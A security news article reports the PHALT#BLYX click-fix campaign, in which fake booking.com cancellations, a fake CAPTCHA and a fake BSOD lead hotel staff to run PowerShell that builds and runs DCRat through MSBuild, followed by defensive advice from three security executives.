Securonix researchers warn of a new campaign targeting the hospitality sector, deceiving users into pasting malicious code.

This campaign, tracked as tracked as PHALT#BLYX, is an infection chain with multiple stages, leveraging click-fix social engineering, a false CAPTCHA, and false “blue screen of death,” or BSOD. Malicious actors gain initial access by tricking targets with a false cancellation of a booking.com reservation. 

The booking.com lure contains a link leading to a fraudulent website. The website presents a false CAPTCHA, leading to a false BSOD. “It is a trick for click-fix that executes a PowerShell command to download a proj file,” the research states. “The campaign leverages MSBuild.exe to compile and execute the payload. The final payload is a heavily obfuscated version of DCRat, capable of process hollowing, keylogging, persistent remote access and to drop secondary payloads.”

According to the research, “The attackers utilize booking.com, a theme that has been abused in the past and remains a persistent threat. The phishing emails notably feature room charge details in Euros, suggesting the campaign is actively targeting European organisations. The use of Russian language within the ‘v.project’ MS build file links this activity to Russian threat factors using DCRat.” 

Below, security leaders discuss this new malware campaign. 

Security Leaders Weigh In 

Christopher Jess, Senior R&D Manager at Black Duck:

This PHALT#BLYX activity is a good example of where attackers don’t require a vulnerability for exploitation. By combining a fake booking.com cancellation lure with a bogus CAPTCHA and a panic-inducing BSOD, the campaign uses the click-fix pattern to coax a user into running PowerShell themselves, then leans on built in tools by abusing trusted Windows tooling like MSBuild.exe to compile and run the next stage. That blend of social engineering plus utilizing legitimate binaries is specifically designed to slip past conventional controls that are tuned for clearly malicious executables. 

Organizations should assume this technique will spread. Click-fix has already shown broad adoption across threat actors, lures, and geographies because it’s low cost to retheme and it relies on user execution rather than a single vulnerable product. What looks like a hospitality (booking.com) problem today can become shipping, HR or finance tomorrow with the same playbook.

So, how do we fight back? Security teams need to break the attack chain where they have the most control: people, privileges, and permitted tools. Train everyone not to run commands just because a web page or verification screen says so. Remind everyone to only check reservations or refunds through the real booking portal or by calling a trusted number. Lock things down further by only allowing developer tools (like MSBuild) on systems that need them, cut back on local admin rights, ensure strong logging, and use tooling to block risky scripts and suspicious process chains (like a browser suddenly launching PowerShell and then MSBuild).

Finally, treat RAT deployment as an incident with follow-on risk. These tools usually mean someone’s poking around, stealing credentials, or setting up more attacks. Be ready to look for signs like unexpected Defender settings, persistence via Startup folder entries, anomalous MSBuild activity, or unexpected outbound traffic. Move fast to quarantine infected machines and reset credentials. 

Note that the campaign targeted European hospitality in late December 2025, timing and sector selection that reinforce how attackers know when to strike for maximum impact.

Kern Smith, Senior Vice President of Global Solutions Engineering at Zimperium:

Campaigns such as this highlight how attackers increasingly rely on social engineering and trusted brand impersonation to bypass traditional controls and these tactics don’t stop at desktops. We routinely see the same lures adapted for mobile delivery, where phishing links, fake CAPTCHAs, and malicious redirects are even harder for users to detect. As attackers refine these deception-based techniques, organizations should assume global spread is inevitable and focus on protecting the device itself. Security teams need continuous, on-device threat detection that can identify malicious links, command execution attempts, and post-click behavior in real time, especially on mobile endpoints that sit outside the visibility of legacy email and network defenses.

Attackers are using techniques like click-fix and fake system errors because they exploit human behavior and the gaps created as work increasingly happens on mobile devices. A mobile-first attack strategy allows threat actors to bypass traditional perimeter, email, and network defenses by pushing users to interact directly with malicious content on their phones, where visibility and enforcement are often weaker. By combining trusted brand lures, browser-based deception, and post-click execution, attackers can scale these campaigns globally with a higher success rate and lower risk of detection.

Lionel Litty, Chief Information Security Officer and Chief Security Architect at Menlo Security:

Displaying a fullscreen BSOD is a key part of tricking the user here. Perhaps surprisingly, a website can enter fullscreen mode without requiring a browser permission prompt. The only prerequisite is a user action that demonstrates the user is interacting with the page. In this attack, this is achieved by having the user click “Reload” on the first fake error page. This serves as a stark reminder of the security risks that come with browsers exposing powerful APIs to untrusted web pages.